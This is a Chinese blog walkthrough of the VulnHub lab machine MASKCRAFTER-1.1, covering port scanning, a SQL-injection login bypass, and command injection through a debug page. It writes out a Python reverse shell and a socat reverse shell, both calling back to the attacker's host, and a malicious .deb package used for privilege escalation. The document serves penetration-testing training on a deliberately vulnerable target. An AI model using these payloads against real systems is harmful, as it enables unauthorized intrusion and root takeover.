vulnhub靶场,MASKCRAFTER-1.1

最新推荐文章于 2024-06-18 15:15:05 发布
最新推荐文章于 2024-06-18 15:15:05 发布
阅读量323 收藏 2
点赞数 1
分类专栏: 靶场实战 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kukudeshuo/article/details/120265429
版权

vulnhub靶场,MASKCRAFTER-1.1

环境准备

靶机下载地址:https://www.vulnhub.com/entry/maskcrafter-11,445/
攻击机:kali(192.168.109.128)
靶机:MASKCRAFTER-1.1(192.168.109.179)
下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式

信息收集

使用arp-scan确定目标靶机

确定目标靶机IP为192.168.109.179
使用nmap扫描查看目标靶机端口开放情况

nmap -Pn -sV -p- -A 192.168.109.179
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-13 13:35 CST
Nmap scan report for 192.168.109.179
Host is up (0.00043s latency).
Not shown: 65526 closed ports
PORT      STATE SERVICE  VERSION
21/tcp    open  ftp      vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 112      115          4096 Mar 30  2020 pub                                                                                                                                                      
| ftp-syst:                                                                                                                                                                                                        
|   STAT:                                                                                                                                                                                                          
| FTP server status:                                                                                                                                                                                               
|      Connected to 192.168.109.128                                                                                                                                                                                
|      Logged in as ftp                                                                                                                                                                                            
|      TYPE: ASCII                                                                                                                                                                                                 
|      No session bandwidth limit                                                                                                                                                                                  
|      Session timeout in seconds is 300                                                                                                                                                                           
|      Control connection is plain text                                                                                                                                                                            
|      Data connections will be plain text                                                                                                                                                                         
|      At session startup, client count was 3                                                                                                                                                                      
|      vsFTPd 3.0.3 - secure, fast, stable                                                                                                                                                                         
|_End of status                                                                                                                                                                                                    
22/tcp    open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)                                                                                                                              
| ssh-hostkey: 
|   2048 8f:1b:43:23:0a:24:8c:66:ad:3d:a2:b9:69:33:4d:d7 (RSA)
|   256 8a:2c:85:7c:2d:96:22:f6:98:f2:4a:b6:7a:88:df:23 (ECDSA)
|_  256 ac:a7:99:15:9c:bf:69:44:d9:c2:96:2a:8f:79:9b:6d (ED25519)
80/tcp    open  http     Apache httpd 2.4.29 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/debug
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Maskcrafter(TM) Login Page
|_Requested resource was login.php
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      33509/tcp   mountd
|   100005  1,2,3      35096/udp   mountd
|   100005  1,2,3      45920/udp6  mountd
|   100005  1,2,3      58911/tcp6  mountd
|   100021  1,3,4      40847/tcp   nlockmgr
|   100021  1,3,4      42439/tcp6  nlockmgr
|   100021  1,3,4      47120/udp6  nlockmgr
|   100021  1,3,4      52309/udp   nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp  open  nfs_acl  3 (RPC #100227)
33509/tcp open  mountd   1-3 (RPC #100005)
40181/tcp open  mountd   1-3 (RPC #100005)
40847/tcp open  nlockmgr 1-4 (RPC #100021)
44431/tcp open  mountd   1-3 (RPC #100005)
MAC Address: 00:0C:29:D2:79:C0 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.43 ms 192.168.109.179

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.74 seconds

开放端口:21、22、80、111、2049、33509、40181、40847、44431
首先查看一下ftp,以匿名用户进行登入

发现一个pub文件,进入看看

发现在pub文件下面还有两个文件,将他们下载到本地

查看NOTES.txt文件内容

这里说请为/debug目录选择一个更强的密码,并且账号是admin,还提示了一个SQL注入,先往后面看
还有一个zip文件,但是解压发现需要密码

浏览器访问目标靶机80端口

这里是一个登入页面,使用暴力破解无效后,想起那个文本里提到的SQL注入使用万能密码登入成功

' or 1=1#
111


虽然登入成功,但是这个页面也没有啥能利用的,再去查看那个文本提到的/debug目录

这里是一个登入框,那个文本里面说了账号为admin,还提醒要为/debug目录设置强密码,说明这里密码肯定为弱密码,果然,使用admin:admin直接登入成功

有三个按钮,可以执行不同的命令

渗透过程

直接使用hackbar抓取POST内容

可以看到执行命令的数据就是在POST内容里,修改为其他命令看是否能执行

命令执行成功,直接来反弹shell
kali:
靶机:

command=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.109.128",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'


可以看到kali这边成功反弹回来一个shell

权限提升

查看该用户的suid权限,没有发现什么能利用的命令

在网站根目录下面发现了数据库配置文件

查看其内容

发现数据库连接账号密码
连接数据库

在creds这张表里发现了压缩包的解压密码

show databases;
use mydatabase;
show tables;
select * from creds;


将压缩包进行解压缩

解压出来得到一个txt文件,查看其内容

成功获得userx用户的密码,使用su命令切换为userx

查看userx用户的sudo命令

发现在/scripts目录下有一个可执行文件,可以在不知道evdaez用户的密码情况下执行该文件
查看该可执行文件内容

查看一下给文件权限

可以看到当前用户是具有所有权限的,只需要向里面写入"/bin/bash",然后以evdaez用户执行该文件就可以获得evdaez用户的shell

成功获得evdaez用户的shell,查看该用户的sudo命令

又发现一个文件,查看其内容

不知道是啥东西,直接上提权网站查询提权方法

kali上执行:socat file:`tty`,raw,echo=0 tcp-listen:12345
靶机上执行:sudo -u researcherx socat tcp-connect:192.168.109.128:12345 exec:/bin/sh,pty,stderr,setsid,sigint,sane

可以看到成功反弹researcherx用户的shell

查看researcherx用户的sudo命令

发现一个命令,再次上提权网站进行查询

kali上执行以下命令,将生成一个可以获得/bin/sh的恶意文件
但是kali上是没有安装fpm,使用sudo gem install fpm安装一下

然后依次输入上面网站给的命令

TF=$(mktemp -d)
echo 'exec /bin/sh' > $TF/x.sh
fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF


成功生成恶意文件,使用python搭建一个临时http服务

靶机进入tmp目录下载该恶意文件

运行该恶意文件

sudo dpkg -i x_1.0_all.deb


成功提升为root权限,切换至其root目录,成功获得flag,靶机MASKCRAFTER-1.1渗透结束

super 硕
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【甄选靶场Vulnhub百个项目渗透——项目一:GoldenEye(密码爆破,图片逆向分析,内核提权)
xnxqwzy的博客
07-29 3133
本文章仅用作实验学习,实验环境均为自行搭建的公开vuinhub靶场,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。1.密码爆破(九头蛇)2.图片逆向分析(binwalk(路由逆向分析工具)exiftool(图虫)strings(识别动态库版本指令))3.内核提权(没有gcc的环境的替代方法)
VulnHub渗透测试实战靶场笔记(持续更新)
晚风不及你
03-05 7403
Breach1.0 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmare和rastamouse进行测试和提供反馈。...
Vulnhub——AI: WEB: 1
最新发布
流水不争先,争的是滔滔不绝
06-18 599
(1)OS-shell,Openssl的利用(2)Linux /etc/passwd文件写入root用户进行提权
Vulnhub】搭建Vulnhub靶机
qq_53058639的博客
01-23 2385
Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。
看完这篇 教你玩转渗透测试靶机vulnhub——DC7
Aluxian_的博客
04-01 6002
Vulnhub靶机DC6渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC7 还是老样子只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/dc/D
【内网渗透】vulnhub三个基础靶场wp
weixin_51614272的博客
09-15 3435
ssh、msf、webdav、linux、kali、basic_pentesting_1、Me-and-My-Girlfriend-1、narak
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
vulnhub靶场实战系列-DC-3实战
05-20
vulnhub靶场实战系列-DC-3实战
VulnHub20230718最新全部靶场详情 - 共701个靶场信息
07-18
由于本人最近打靶,但是【VulnHub】网站访问总是有些显示问题,靶场信息查找也很不方便,所以本人总结了【VulnHub】上面所有靶场的全部基本信息,方便各位按照自己需求进行搜索查看
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。...
[渗透测试实战]vulnhub靶场1 初步掌握渗透流程(详细步骤)
知识库总结、分享
07-01 1520
Fuzzing可以帮助发现那些常规的安全测试无法发现的漏洞和弱点,因为它可以测试系统的响应能力,以及处理异常数据的能力。目前已知系统提供的服务ssh和http,web用的是WordPress cms系统,渗透系统希望获得用户和密码,访问WordPress看能不能得到账户信息。拿到正确参数,需要传入参数访问url拿到系统信息,参数file是文件的意思,第一想到的是拿到系统的账户文件/etc/passwd,继续传参数访问。不报gcc相关的错误了,也算解决了一个问题,又出现了程序执行权限问题,真是大肠包小肠!
Vulnhub入门实战-Wakanda
qq_24033605的博客
07-14 2209
下载链接 描述: 1.探测主机的IP地址 2.使用nmap查看靶机开放端口。 开放了4个端口,老样子先从http下手。 3.进去发现没什么可以点的,于是进行目录扫描。 状态码都是200,但是size为0,所以返回的都是空页面。 查看主页源代码,发现一个注释。 猜测存在本地文件包含漏洞,抓包看一下。 成功读取主页源码,并发现密码,猜测下一步根据账号和密码进行ssh登录。 账户猜测就是主页的namemamadou,passwdNiamey4Ever227!!! 这里的使用凭证是有效的,但是还
渗透测试part(二):Vulnhub配置(以EMPIRE: BREAKOUT为例)
m0_56592545的博客
06-25 313
在part(一)中,简要介绍了渗透测试的基本概念,并在第七部分提及了Vulnhub靶场。本文主要针对Vulnhub靶场的配置以及攻击机Kali的配置进行说明,希望能够帮助大家搭建一个简单的攻防环境,并踏出渗透测试的第一步。
breach-1--vulnhub靶场
m0_46982383的博客
08-14 2347
keytool -importkeystore -srckeystore /root/下载/keystore -destkeystore /root/下载/keystore.p12 -deststoretype pkcs12。tidyup.sh这是一段清理脚本,描述中说明每3分钟执行清理,删除webapps目录下的文件,因此之前上传的菜刀马总是被删除,需要重新上传。访问https://192.168.110.140:8443/getshell/,等几秒,kali获得反弹shell。*u=G)4m7zB。..
ftpclient 下载文件失败,ftp返回信息:425 Failed to establish connection
叮咚侠的博客
01-07 3699
ftp上一个文件直接使用浏览器是可以访问下载的,使用FtpClient下载ftp的文件的时候,有一个文件下载不下来,ftp返回的信息是: 425 Failed to establish connection 其他各项信息是(供参考): getLocalAddress:/159.226.194.17 getControlEncoding:ISO-8859-1 getDataConnection...
vulnhub靶场——VULNERABLE DOCKER: 1 Easy
Czheisenberg的博客
09-26 2011
ULNERABLE DOCKER: 1 Easy 渗透过程。须要利用到内网穿透工具来打内网。
HTB Lame[Hack The Box HTB靶场]writeup系列1
重新启程
02-01 2835
首先祈祷一下SARS病情尽快过去,武汉加油!湖北加油! 为了不给国家添乱,所以我在HTB订阅了VIP,准备搞下Retired Machines的靶机。 目录 0x00 靶场介绍 0x01 扫描端口 0x02 ftp服务 0x03 smb服务 0x00 靶场介绍 我们从第一个lame开始。 如何注册账号,购买vip,网上有大把文章,这里我就不再记录了。 这个系列主要是...
vulnhub靶场通关
09-09
vulnhub靶场是一个用于学习和测试网络安全技能的平台。通关vulnhub靶场需要进行一系列的渗透测试和漏洞利用操作。根据引用中提供的目录,以下是一个通关vulnhub靶场的大致步骤: 1. 环境搭建:下载靶场环境,并启动...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

super 硕

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值